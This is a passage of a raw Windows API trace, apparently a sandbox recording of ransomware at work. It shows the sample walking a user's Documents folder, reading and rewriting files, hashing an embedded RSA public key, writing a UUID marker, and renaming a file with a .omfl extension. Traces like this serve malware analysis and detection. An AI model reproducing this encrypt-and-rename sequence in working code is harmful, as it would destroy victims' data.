hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.354] GetCurrentThreadId () returned 0x618 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.354] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.354] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17400 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17418 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173e8 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17430 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0132.355] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.355] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17400 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17400 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.356] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.356] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173e8 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbb08 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.357] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.357] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x692b, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x692b, lpOverlapped=0x0) returned 1 [0132.358] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0132.358] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x6930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.358] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.358] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.358] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.358] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.358] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.358] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.358] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.358] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.358] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.358] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.359] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.359] CloseHandle (hObject=0x610) returned 1 [0132.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.362] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0132.362] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.362] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\IqiGUqs.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\iqiguqs.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\IqiGUqs.csv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\iqiguqs.csv.omfl")) returned 1 [0132.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.363] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.363] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.364] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b5e950, ftCreationTime.dwHighDateTime=0x1d5e268, ftLastAccessTime.dwLowDateTime=0x77f17430, ftLastAccessTime.dwHighDateTime=0x1d5da27, ftLastWriteTime.dwLowDateTime=0x77f17430, ftLastWriteTime.dwHighDateTime=0x1d5da27, nFileSizeHigh=0x0, nFileSizeLow=0xe93e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PDSX.rtf", cAlternateFileName="")) returned 1 [0132.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0132.364] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.364] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\PDSX.rtf") returned=".rtf" [0132.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\PDSX.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\pdsx.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.365] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=59710) returned 1 [0132.365] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.368] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xe918, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.368] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.369] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.369] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.369] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.369] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xe93e, lpOverlapped=0x0) returned 1 [0132.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.369] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.370] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.371] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.371] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.371] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.371] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.371] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.371] GetLastError () returned 0x0 [0132.371] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.371] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.371] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.371] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.371] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.371] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.371] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.371] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xe940) returned 0xdd35410 [0132.373] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb08 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173d0 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb50 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173e8 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17418 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17430 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.374] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.374] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17430 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17418 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: 